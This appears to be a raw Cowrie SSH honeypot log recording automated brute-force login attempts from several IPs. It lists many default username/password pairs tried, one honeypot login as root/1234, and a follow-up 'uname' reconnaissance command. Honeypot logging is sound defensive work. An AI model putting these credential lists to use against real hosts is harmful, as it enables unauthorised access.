{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:38.431383Z","src_ip":"83.168.105.65","session":"656d34a8a190"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:38.545846Z","src_ip":"83.168.105.65","session":"656d34a8a190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52418,"dst_ip":"1.2.3.4","dst_port":22,"session":"77fea1c743fa","protocol":"ssh","message":"New connection: 212.227.125.160:52418 (1.2.3.4:22) [session: 77fea1c743fa]","sensor":"my-vps","timestamp":"2025-08-26T11:25:39.335377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:39.337182Z","src_ip":"212.227.125.160","session":"77fea1c743fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:39.385632Z","src_ip":"212.227.125.160","session":"77fea1c743fa"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:39.583388Z","src_ip":"83.168.105.65","session":"656d34a8a190"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:39.599281Z","src_ip":"212.227.125.160","session":"77fea1c743fa"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34244,"dst_ip":"1.2.3.4","dst_port":22,"session":"06da6430a879","protocol":"ssh","message":"New connection: 196.251.86.249:34244 (1.2.3.4:22) [session: 06da6430a879]","sensor":"my-vps","timestamp":"2025-08-26T11:25:40.133186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:40.747564Z","src_ip":"196.251.86.249","session":"06da6430a879"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:25:40.748422Z","src_ip":"196.251.86.249","session":"06da6430a879"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:40.802031Z","src_ip":"212.227.125.160","session":"77fea1c743fa"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123qwe","message":"login attempt [hadoop/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:43.309627Z","src_ip":"196.251.86.249","session":"06da6430a879"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:44.884722Z","src_ip":"196.251.86.249","session":"06da6430a879"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53190,"dst_ip":"1.2.3.4","dst_port":22,"session":"db0960648966","protocol":"ssh","message":"New connection: 212.227.125.160:53190 (1.2.3.4:22) [session: db0960648966]","sensor":"my-vps","timestamp":"2025-08-26T11:25:45.382176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:45.383167Z","src_ip":"212.227.125.160","session":"db0960648966"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:45.434836Z","src_ip":"212.227.125.160","session":"db0960648966"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:45.591500Z","src_ip":"212.227.125.160","session":"db0960648966"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:46.645269Z","src_ip":"212.227.125.160","session":"db0960648966"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53962,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdedab38cc5c","protocol":"ssh","message":"New connection: 212.227.125.160:53962 (1.2.3.4:22) [session: bdedab38cc5c]","sensor":"my-vps","timestamp":"2025-08-26T11:25:51.300288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:51.301136Z","src_ip":"212.227.125.160","session":"bdedab38cc5c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:51.352483Z","src_ip":"212.227.125.160","session":"bdedab38cc5c"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:51.508787Z","src_ip":"212.227.125.160","session":"bdedab38cc5c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:52.858057Z","src_ip":"212.227.125.160","session":"bdedab38cc5c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48566,"dst_ip":"1.2.3.4","dst_port":22,"session":"e56d025d10b8","protocol":"ssh","message":"New connection: 83.168.105.65:48566 (1.2.3.4:22) [session: e56d025d10b8]","sensor":"my-vps","timestamp":"2025-08-26T11:25:53.843699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:53.844339Z","src_ip":"83.168.105.65","session":"e56d025d10b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:53.881681Z","src_ip":"83.168.105.65","session":"e56d025d10b8"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:25:53.997732Z","src_ip":"83.168.105.65","session":"e56d025d10b8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:55.037192Z","src_ip":"83.168.105.65","session":"e56d025d10b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54730,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ef43b726b5f","protocol":"ssh","message":"New connection: 212.227.125.160:54730 (1.2.3.4:22) [session: 0ef43b726b5f]","sensor":"my-vps","timestamp":"2025-08-26T11:25:57.060356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:25:57.062073Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:25:57.401498Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:25:58.393184Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:25:58.901552Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:25:58.902332Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:59.108791Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:25:59.109850Z","src_ip":"212.227.125.160","session":"0ef43b726b5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55504,"dst_ip":"1.2.3.4","dst_port":22,"session":"24e1fc5b4dcb","protocol":"ssh","message":"New connection: 212.227.125.160:55504 (1.2.3.4:22) [session: 24e1fc5b4dcb]","sensor":"my-vps","timestamp":"2025-08-26T11:26:03.675869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:03.676786Z","src_ip":"212.227.125.160","session":"24e1fc5b4dcb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:03.732752Z","src_ip":"212.227.125.160","session":"24e1fc5b4dcb"}
{"eventid":"cowrie.login.failed","username":"wso2","password":"wso2","message":"login attempt [wso2/wso2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:03.908000Z","src_ip":"212.227.125.160","session":"24e1fc5b4dcb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:05.165063Z","src_ip":"212.227.125.160","session":"24e1fc5b4dcb"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47988,"dst_ip":"1.2.3.4","dst_port":22,"session":"22ffc7f20f4a","protocol":"ssh","message":"New connection: 83.168.105.65:47988 (1.2.3.4:22) [session: 22ffc7f20f4a]","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.173296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.174887Z","src_ip":"83.168.105.65","session":"22ffc7f20f4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56272,"dst_ip":"1.2.3.4","dst_port":22,"session":"86828ab2c312","protocol":"ssh","message":"New connection: 212.227.125.160:56272 (1.2.3.4:22) [session: 86828ab2c312]","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.175976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.177289Z","src_ip":"212.227.125.160","session":"86828ab2c312"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.211661Z","src_ip":"83.168.105.65","session":"22ffc7f20f4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.229928Z","src_ip":"212.227.125.160","session":"86828ab2c312"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:09.323889Z","src_ip":"83.168.105.65","session":"22ffc7f20f4a"}
